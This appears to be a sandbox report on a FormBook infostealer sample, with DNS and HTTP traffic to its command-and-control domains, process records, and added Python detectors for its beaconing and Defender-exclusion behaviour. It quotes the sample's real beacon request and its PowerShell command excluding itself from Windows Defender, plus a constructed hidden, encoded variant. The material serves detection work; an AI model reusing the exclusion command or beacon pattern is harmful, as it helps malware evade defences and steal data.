Oct 7, 2024 14:47:43.395895004 CEST | 49743 | 80 | 192.168.2.4 | 188.114.96.3
Oct 7, 2024 14:47:43.395895004 CEST | 49743 | 80 | 192.168.2.4 | 188.114.96.3
Oct 7, 2024 14:47:43.400789976 CEST | 80 | 49743 | 188.114.96.3 | 192.168.2.4
Oct 7, 2024 14:47:43.844379902 CEST | 80 | 49743 | 188.114.96.3 | 192.168.2.4
Oct 7, 2024 14:47:43.844783068 CEST | 49743 | 80 | 192.168.2.4 | 188.114.96.3
Oct 7, 2024 14:47:43.845257044 CEST | 80 | 49743 | 188.114.96.3 | 192.168.2.4
Oct 7, 2024 14:47:43.845330000 CEST | 49743 | 80 | 192.168.2.4 | 188.114.96.3
Oct 7, 2024 14:47:43.849721909 CEST | 80 | 49743 | 188.114.96.3 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 7, 2024 14:47:43.377798080 CEST | 55036 | 53 | 192.168.2.4 | 1.1.1.1
Oct 7, 2024 14:47:43.390223026 CEST | 53 | 55036 | 1.1.1.1 | 192.168.2.4
Oct 7, 2024 14:48:03.858387947 CEST | 51744 | 53 | 192.168.2.4 | 1.1.1.1
Oct 7, 2024 14:48:03.874089003 CEST | 53 | 51744 | 1.1.1.1 | 192.168.2.4
Oct 7, 2024 14:48:24.486824036 CEST | 60317 | 53 | 192.168.2.4 | 1.1.1.1
Oct 7, 2024 14:48:24.497123003 CEST | 53 | 60317 | 1.1.1.1 | 192.168.2.4
Oct 7, 2024 14:48:44.676063061 CEST | 54706 | 53 | 192.168.2.4 | 1.1.1.1
Oct 7, 2024 14:48:44.817770004 CEST | 53 | 54706 | 1.1.1.1 | 192.168.2.4
Oct 7, 2024 14:49:05.127173901 CEST | 59662 | 53 | 192.168.2.4 | 1.1.1.1
Oct 7, 2024 14:49:05.136404037 CEST | 53 | 59662 | 1.1.1.1 | 192.168.2.4
Oct 7, 2024 14:49:25.478270054 CEST | 51275 | 53 | 192.168.2.4 | 1.1.1.1
Oct 7, 2024 14:49:25.487400055 CEST | 53 | 51275 | 1.1.1.1 | 192.168.2.4
Oct 7, 2024 14:49:45.910301924 CEST | 61063 | 53 | 192.168.2.4 | 1.1.1.1
Oct 7, 2024 14:49:46.085643053 CEST | 53 | 61063 | 1.1.1.1 | 192.168.2.4
Oct 7, 2024 14:50:06.300168991 CEST | 51340 | 53 | 192.168.2.4 | 1.1.1.1
Oct 7, 2024 14:50:06.394150019 CEST | 53 | 51340 | 1.1.1.1 | 192.168.2.4
Oct 7, 2024 14:50:26.721621990 CEST | 54146 | 53 | 192.168.2.4 | 1.1.1.1
Oct 7, 2024 14:50:26.733623981 CEST | 53 | 54146 | 1.1.1.1 | 192.168.2.4
Oct 7, 2024 14:50:47.188524008 CEST | 62217 | 53 | 192.168.2.4 | 1.1.1.1
Oct 7, 2024 14:50:47.283157110 CEST | 53 | 62217 | 1.1.1.1 | 192.168.2.4
Oct 7, 2024 14:51:29.924470901 CEST | 53245 | 53 | 192.168.2.4 | 1.1.1.1
Oct 7, 2024 14:51:29.935204029 CEST | 53 | 53245 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 7, 2024 14:47:43.377798080 CEST | 192.168.2.4 | 1.1.1.1 | 0x5163 | Standard query (0) | www.j88.travel | A (IP address) | IN (0x0001) | false
Oct 7, 2024 14:48:03.858387947 CEST | 192.168.2.4 | 1.1.1.1 | 0xc38d | Standard query (0) | www.venir-bienne.info | A (IP address) | IN (0x0001) | false
Oct 7, 2024 14:48:24.486824036 CEST | 192.168.2.4 | 1.1.1.1 | 0x14bf | Standard query (0) | www.ridges-freezers-56090.bond | A (IP address) | IN (0x0001) | false
Oct 7, 2024 14:48:44.676063061 CEST | 192.168.2.4 | 1.1.1.1 | 0x984 | Standard query (0) | www.oko.events | A (IP address) | IN (0x0001) | false
Oct 7, 2024 14:49:05.127173901 CEST | 192.168.2.4 | 1.1.1.1 | 0x7feb | Standard query (0) | www.earing-tests-69481.bond | A (IP address) | IN (0x0001) | false
Oct 7, 2024 14:49:25.478270054 CEST | 192.168.2.4 | 1.1.1.1 | 0xcb22 | Standard query (0) | www.458881233.men | A (IP address) | IN (0x0001) | false
Oct 7, 2024 14:49:45.910301924 CEST | 192.168.2.4 | 1.1.1.1 | 0xcc2e | Standard query (0) | www.delark.click | A (IP address) | IN (0x0001) | false
Oct 7, 2024 14:50:06.300168991 CEST | 192.168.2.4 | 1.1.1.1 | 0x3fe2 | Standard query (0) | www.ilw.legal | A (IP address) | IN (0x0001) | false
Oct 7, 2024 14:50:26.721621990 CEST | 192.168.2.4 | 1.1.1.1 | 0x8002 | Standard query (0) | www.02s-pest-control-us-ze.fun | A (IP address) | IN (0x0001) | false
Oct 7, 2024 14:50:47.188524008 CEST | 192.168.2.4 | 1.1.1.1 | 0xc480 | Standard query (0) | www.sx9u.shop | A (IP address) | IN (0x0001) | false
Oct 7, 2024 14:51:29.924470901 CEST | 192.168.2.4 | 1.1.1.1 | 0x8115 | Standard query (0) | www.khizmetlergirisyapzzz2024.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 7, 2024 14:47:43.390223026 CEST | 1.1.1.1 | 192.168.2.4 | 0x5163 | No error (0) | www.j88.travel |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 14:47:43.390223026 CEST | 1.1.1.1 | 192.168.2.4 | 0x5163 | No error (0) | www.j88.travel |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 14:48:03.874089003 CEST | 1.1.1.1 | 192.168.2.4 | 0xc38d | Name error (3) | www.venir-bienne.info | none | none | A (IP address) | IN (0x0001) | false
Oct 7, 2024 14:48:24.497123003 CEST | 1.1.1.1 | 192.168.2.4 | 0x14bf | Name error (3) | www.ridges-freezers-56090.bond | none | none | A (IP address) | IN (0x0001) | false
Oct 7, 2024 14:48:44.817770004 CEST | 1.1.1.1 | 192.168.2.4 | 0x984 | No error (0) | www.oko.events |  | 185.26.122.70 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 14:49:05.136404037 CEST | 1.1.1.1 | 192.168.2.4 | 0x7feb | Name error (3) | www.earing-tests-69481.bond | none | none | A (IP address) | IN (0x0001) | false
Oct 7, 2024 14:49:25.487400055 CEST | 1.1.1.1 | 192.168.2.4 | 0xcb22 | Name error (3) | www.458881233.men | none | none | A (IP address) | IN (0x0001) | false
Oct 7, 2024 14:49:46.085643053 CEST | 1.1.1.1 | 192.168.2.4 | 0xcc2e | Name error (3) | www.delark.click | none | none | A (IP address) | IN (0x0001) | false
Oct 7, 2024 14:50:06.394150019 CEST | 1.1.1.1 | 192.168.2.4 | 0x3fe2 | Name error (3) | www.ilw.legal | none | none | A (IP address) | IN (0x0001) | false
Oct 7, 2024 14:50:26.733623981 CEST | 1.1.1.1 | 192.168.2.4 | 0x8002 | Name error (3) | www.02s-pest-control-us-ze.fun | none | none | A (IP address) | IN (0x0001) | false
Oct 7, 2024 14:50:47.283157110 CEST | 1.1.1.1 | 192.168.2.4 | 0xc480 | Name error (3) | www.sx9u.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 7, 2024 14:51:29.935204029 CEST | 1.1.1.1 | 192.168.2.4 | 0x8115 | Name error (3) | www.khizmetlergirisyapzzz2024.net | none | none | A (IP address) | IN (0x0001) | false
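The DNS tables above show the pattern that makes this sample recognisable on the wire even when the HTTP C2 never answers: eleven distinct www.* hosts are queried one after another, roughly 20 seconds apart, and nine of them come back NXDOMAIN; only www.j88.travel and www.oko.events resolve. FormBook walks its configured domain list this way, so a resolver log alone is enough to spot the beaconing. The Python below is an added example written for this page, not part of the Joe Sandbox report: it parses the query/answer pairs transcribed from the tables (joined on transaction ID), measures the inter-query interval and NXDOMAIN ratio, and returns a verdict. The thresholds (eight domains, half NXDOMAIN, 25 percent jitter) are assumptions chosen for illustration and should be tuned against real resolver data.

```python
import re
from datetime import datetime
from statistics import median

# Constructed input: the query rows above joined with their answers on the
# transaction ID.  Columns: timestamp | trans id | name | reply code | addresses
DNS_TABLE = """\
Oct 7, 2024 14:47:43.377798080 CEST | 0x5163 | www.j88.travel | No error (0) | 188.114.96.3,188.114.97.3
Oct 7, 2024 14:48:03.858387947 CEST | 0xc38d | www.venir-bienne.info | Name error (3) | none
Oct 7, 2024 14:48:24.486824036 CEST | 0x14bf | www.ridges-freezers-56090.bond | Name error (3) | none
Oct 7, 2024 14:48:44.676063061 CEST | 0x984 | www.oko.events | No error (0) | 185.26.122.70
Oct 7, 2024 14:49:05.127173901 CEST | 0x7feb | www.earing-tests-69481.bond | Name error (3) | none
Oct 7, 2024 14:49:25.478270054 CEST | 0xcb22 | www.458881233.men | Name error (3) | none
Oct 7, 2024 14:49:45.910301924 CEST | 0xcc2e | www.delark.click | Name error (3) | none
Oct 7, 2024 14:50:06.300168991 CEST | 0x3fe2 | www.ilw.legal | Name error (3) | none
Oct 7, 2024 14:50:26.721621990 CEST | 0x8002 | www.02s-pest-control-us-ze.fun | Name error (3) | none
Oct 7, 2024 14:50:47.188524008 CEST | 0xc480 | www.sx9u.shop | Name error (3) | none
Oct 7, 2024 14:51:29.924470901 CEST | 0x8115 | www.khizmetlergirisyapzzz2024.net | Name error (3) | none
"""

TS_RE = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(\d{1,9}) \w+$")

def parse_timestamp_ns(text):
    """Joe Sandbox timestamps carry nine fractional digits, more than datetime's
    %f accepts, so the fraction is kept as integer nanoseconds."""
    m = TS_RE.match(text.strip())
    if not m:
        raise ValueError(f"unexpected timestamp: {text!r}")
    dt = datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S")
    whole = dt.toordinal() * 86400 + dt.hour * 3600 + dt.minute * 60 + dt.second
    return whole * 10**9 + int(m.group(2).ljust(9, "0"))

def parse_dns_table(table):
    records = []
    for line in table.splitlines():
        if not line.strip():
            continue
        ts, txid, name, rcode, addrs = [c.strip() for c in line.split("|")]
        records.append({
            "ts_ns": parse_timestamp_ns(ts),
            "txid": int(txid, 16),
            "name": name,
            "rcode": int(re.search(r"\((\d+)\)", rcode).group(1)),
            "addresses": [] if addrs == "none" else addrs.split(","),
        })
    return records

def analyse_rotation(records, min_domains=8, min_nxdomain_ratio=0.5, max_jitter=0.25):
    """Score a query sequence for the FormBook pattern: many distinct www.* hosts
    tried in turn at a near-constant interval, most of them NXDOMAIN.
    The thresholds are illustrative assumptions, not values from the report."""
    records = sorted(records, key=lambda r: r["ts_ns"])
    names = [r["name"] for r in records]
    nxdomain = [r["name"] for r in records if r["rcode"] == 3]
    resolved = {r["name"]: r["addresses"] for r in records if r["rcode"] == 0 and r["addresses"]}
    gaps = [(b["ts_ns"] - a["ts_ns"]) / 1e9 for a, b in zip(records, records[1:])]
    period = median(gaps) if gaps else 0.0
    # Fraction of gaps that sit within max_jitter of the median period.
    steady = sum(1 for g in gaps if abs(g - period) <= max_jitter * period) / len(gaps) if gaps else 0.0
    distinct = len(set(names))
    verdict = (distinct >= min_domains
               and len(nxdomain) / len(records) >= min_nxdomain_ratio
               and all(n.startswith("www.") for n in names)
               and steady >= 0.75)
    return {"queries": len(records), "distinct_domains": distinct, "nxdomain": len(nxdomain),
            "resolved": resolved, "median_interval_s": period, "steady_fraction": steady,
            "formbook_like": verdict}

if __name__ == "__main__":
    for key, value in analyse_rotation(parse_dns_table(DNS_TABLE)).items():
        print(f"{key}: {value}")
```

On the report's data this yields 11 queries, 9 NXDOMAIN, a median interval of about 20.4 s with nine of ten gaps inside the jitter window (the final gap is 42.7 s), and the two resolved hosts with their addresses; those two are the only names that can have carried C2 traffic.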
• www.j88.travel
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49743 | 188.114.96.3 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 14:47:43.395895004 CEST | 170 | OUT | GET /c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+m2NwmP2xDXw&D4hl2=fT-dvVK08nUDKdF HTTP/1.1
    Host: www.j88.travel
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii: (empty; the seven bytes above are NUL)
Oct 7, 2024 14:47:43.844379902 CEST | 937 | IN | HTTP/1.1 301 Moved Permanently
    Date: Mon, 07 Oct 2024 12:47:43 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: close
    Cache-Control: max-age=3600
    Expires: Mon, 07 Oct 2024 13:47:43 GMT
    Location: https://www.j88.travel/c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+m2NwmP2xDXw&D4hl2=fT-dvVK08nUDKdF
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UWERR3Ig28l%2F23thf4RZCnhm%2BE5RJTlJ8RVzkLCtEf%2BoARmU%2F53RNek4p14UkxKOVq7vWrJyMoKsnlDXljM%2F6T%2BXS2ry3eM147S06kNF6OFgoMejNrVnvmkqLghviDl0lQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Speculation-Rules: "/cdn-cgi/speculation"
    Server: cloudflare
    CF-RAY: 8cee005aab5b41e1-EWR
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
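The single HTTP exchange above is worth reading closely: the request is sent by explorer.exe (PID 2580), the process the sample injected into, over plaintext port 80; the path is a short random segment (/c24t/); the first query parameter carries a base64 blob, the second a short token; the only headers are Host and Connection: close; and a GET is followed by seven NUL bytes. The server is a Cloudflare front that answers with a 301 to the HTTPS URL, and in the packets shown here no follow-up on 443 appears. The Python below is an added example written for this page, not part of the Joe Sandbox report or the FormBook code: it parses the captured request bytes, scores the indicators listed above, and contrasts the result with a constructed, ordinary browser request. The SYSTEM_PROCESSES list, the benign sample and the score threshold are assumptions for illustration.

```python
import base64
import re
from urllib.parse import urlsplit

# Request bytes transcribed from the session above: request line, the two
# headers, then the seven NUL bytes the report shows as "Data Raw".
REQUEST = (
    b"GET /c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+m2NwmP2xDXw"
    b"&D4hl2=fT-dvVK08nUDKdF HTTP/1.1\r\n"
    b"Host: www.j88.travel\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"\x00\x00\x00\x00\x00\x00\x00"
)
SESSION = {"pid": 2580, "process": r"C:\Windows\explorer.exe", "dst": "188.114.96.3", "dport": 80}

# Constructed contrast case (not from the report): an ordinary browser fetch.
BENIGN_REQUEST = (
    b"GET /news/index.html?page=2 HTTP/1.1\r\n"
    b"Host: intranet.example\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Accept: text/html\r\n"
    b"Connection: keep-alive\r\n"
    b"\r\n"
)
BENIGN_SESSION = {"pid": 4120, "process": r"C:\Program Files\Mozilla Firefox\firefox.exe",
                  "dst": "203.0.113.10", "dport": 80}

# Windows binaries that should never originate outbound HTTP on their own.
# Assumed starting list for this example; extend it for the environment.
SYSTEM_PROCESSES = {"explorer.exe", "svchost.exe", "wininit.exe", "winlogon.exe", "lsass.exe"}
PATH_RE = re.compile(r"^/[A-Za-z0-9]{2,8}/$")        # e.g. /c24t/
TOKEN_RE = re.compile(r"^[A-Za-z0-9_-]{8,24}$")      # e.g. fT-dvVK08nUDKdF

def parse_request(raw):
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("ascii", errors="replace").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}

def decode_base64(value):
    """Strict base64 check; returns the decoded bytes or None."""
    if not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value):
        return None
    try:
        return base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
    except ValueError:
        return None

def classify(req, session):
    parts = urlsplit(req["target"])
    # Split by hand: parse_qsl would turn '+' into a space and corrupt the base64.
    params = [kv.partition("=") for kv in parts.query.split("&") if kv]
    keys = [k for k, _, _ in params]
    values = [v for _, _, v in params]
    payload = decode_base64(values[0]) if values else None
    indicators = {
        "system_process_origin": session["process"].rsplit("\\", 1)[-1].lower() in SYSTEM_PROCESSES,
        "short_random_path": bool(PATH_RE.match(parts.path)),
        "base64_blob_then_token": len(params) == 2 and payload is not None
                                  and len(payload) >= 16 and bool(TOKEN_RE.match(values[1])),
        "digit_bearing_param_names": bool(keys) and all(re.search(r"\d", k) for k in keys),
        "host_and_close_only": set(req["headers"]) == {"host", "connection"}
                               and req["headers"]["connection"].lower() == "close",
        "nul_padding_on_get": req["method"] == "GET" and bool(req["body"]) and set(req["body"]) == {0},
        "cleartext_http": session["dport"] == 80,
    }
    score = sum(indicators.values())
    return {"path": parts.path, "indicators": indicators, "score": score,
            "payload_bytes": len(payload) if payload else 0, "suspicious": score >= 5}

if __name__ == "__main__":
    print(classify(parse_request(REQUEST), SESSION))
    print(classify(parse_request(BENIGN_REQUEST), BENIGN_SESSION))
```

The captured request trips all seven indicators (the first parameter decodes to 51 bytes, which is the encrypted beacon body rather than anything readable), while the browser request scores only the cleartext-HTTP point. The process-origin check is the one that survives a change of URI scheme: a C2 that moves to HTTPS still has explorer.exe as the client.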


Target ID: 0
Start time: 08:47:00
Start date: 07/10/2024
Path: C:\Users\user\Desktop\RFQ 245801.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\RFQ 245801.exe"
Imagebase: 0x620000
File size: 713'736 bytes
MD5 hash: 4BE29153BC863FA6D2914AAB9759E6AA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low
Has exited: true

Target ID: 2
Start time: 08:47:03
Start date: 07/10/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe"
Imagebase: 0x260000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true
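Target 2 is the defence-evasion step: three seconds after launch, the sample (Target 0, running from the user's Desktop) spawns PowerShell with Add-MpPreference -ExclusionPath pointing at its own path, so Windows Defender stops scanning the file that is about to hollow itself. The telling detail for detection is not the cmdlet alone, which administrators also use, but that the excluded path is the parent process's own image. The Python below is an added example written for this page, not part of the Joe Sandbox report: it grades process-creation events (Sysmon-style Image / CommandLine / ParentImage fields) for exclusion changes, unwraps an -EncodedCommand payload when one is present, and raises severity when the exclusion covers the parent binary or the parent runs from a user-writable directory. The first event is transcribed from Targets 0 and 2 above; the other three events and the directory markers are constructed assumptions.

```python
import base64
import re

CMDLET_RE = re.compile(r"\b(?:Add|Set)-MpPreference\b", re.I)
EXCLUSION_RE = re.compile(
    r"-Exclusion(?:Path|Process|Extension)\s+(?:\"([^\"]+)\"|'([^']+)'|([^\s,]+))", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_RE = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)
# Directory markers a normal user can write to (lower-cased, backslash form); assumed list.
USER_WRITABLE_MARKERS = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")

# Constructed here so the second event carries a genuine UTF-16LE base64 payload.
ENCODED_PAYLOAD = base64.b64encode(
    r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"'.encode("utf-16le")
).decode("ascii")

EVENTS = [
    {   # Targets 0 and 2 above: the sample spawns PowerShell to exclude itself
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe"',
        "ParentImage": r"C:\Users\user\Desktop\RFQ 245801.exe",
    },
    {   # constructed: same cmdlet hidden behind -EncodedCommand, parent dropped in %TEMP%
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -nop -w hidden -enc " + ENCODED_PAYLOAD,
        "ParentImage": r"C:\Users\user\AppData\Local\Temp\update.exe",
    },
    {   # constructed: an administrator excluding a build tree from an elevated console
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell.exe Add-MpPreference -ExclusionPath "C:\Builds"',
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {   # constructed: unrelated PowerShell activity
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe Get-Process | Select-Object -First 5",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
]

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if there is none."""
    for m in ENCODED_RE.finditer(cmdline):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("utf-16le")
        except ValueError:          # bad base64 or odd byte count for UTF-16
            continue
        if text.isprintable():
            return text
    return None

def _norm(path):
    return path.strip("\"' ").replace("/", "\\").lower().rstrip("\\")

def exclusions_in(cmdline):
    """Exclusion values an Add-/Set-MpPreference call adds (first value of each
    parameter; comma-separated lists are not expanded here)."""
    effective = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded:
        effective = cmdline + " " + decoded
    if not CMDLET_RE.search(effective):
        return []
    return [_norm(next(g for g in m.groups() if g)) for m in EXCLUSION_RE.finditer(effective)]

def assess(event):
    """Grade one process-creation event; None when it is not an exclusion change."""
    excluded = exclusions_in(event["CommandLine"])
    if not excluded:
        return None
    parent = _norm(event["ParentImage"])
    # The exclusion names the parent binary itself or a directory it lives in.
    self_exclusion = any(parent == e or parent.startswith(e + "\\") for e in excluded)
    parent_user_writable = any(marker in parent for marker in USER_WRITABLE_MARKERS)
    return {"excluded": excluded,
            "self_exclusion": self_exclusion,
            "parent_user_writable": parent_user_writable,
            "encoded": decode_encoded_command(event["CommandLine"]) is not None,
            "severity": "high" if (self_exclusion or parent_user_writable) else "medium"}

if __name__ == "__main__":
    for event in EVENTS:
        print(event["ParentImage"], "->", assess(event))
```

Every exclusion change is worth a ticket (the administrator case comes out "medium"), but the two cases where the parent benefits from its own exclusion, plaintext or base64-wrapped, come out "high" and are the ones to page on.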

Target ID: 3
Start time: 08:47:03
Start date: 07/10/2024
Path: C:\Users\user\Desktop\RFQ 245801.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\RFQ 245801.exe"
Imagebase: 0x50000
File size: 713'736 bytes
MD5 hash: 4BE29153BC863FA6D2914AAB9759E6AA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 4
Start time: 08:47:03
Start date: 07/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                                                                                                Target ID:5
                                                                                                                                                                                Start time:08:47:03
                                                                                                                                                                                Start date:07/10/2024
                                                                                                                                                                                Path:C:\Users\user\Desktop\RFQ 245801.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\RFQ 245801.exe"
                                                                                                                                                                                Imagebase:0xc30000
                                                                                                                                                                                File size:713'736 bytes
                                                                                                                                                                                MD5 hash:4BE29153BC863FA6D2914AAB9759E6AA
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Target ID:6
                                                                                                                                                                                Start time:08:47:04
                                                                                                                                                                                Start date:07/10/2024
                                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                Imagebase:0x7ff72b770000
                                                                                                                                                                                File size:5'141'208 bytes
                                                                                                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                Target ID:7
                                                                                                                                                                                Start time:08:47:09
                                                                                                                                                                                Start date:07/10/2024
                                                                                                                                                                                Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Windows\SysWOW64\NETSTAT.EXE"
                                                                                                                                                                                Imagebase:0x640000
                                                                                                                                                                                File size:32'768 bytes
                                                                                                                                                                                MD5 hash:9DB170ED520A6DD57B5AC92EC537368A
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
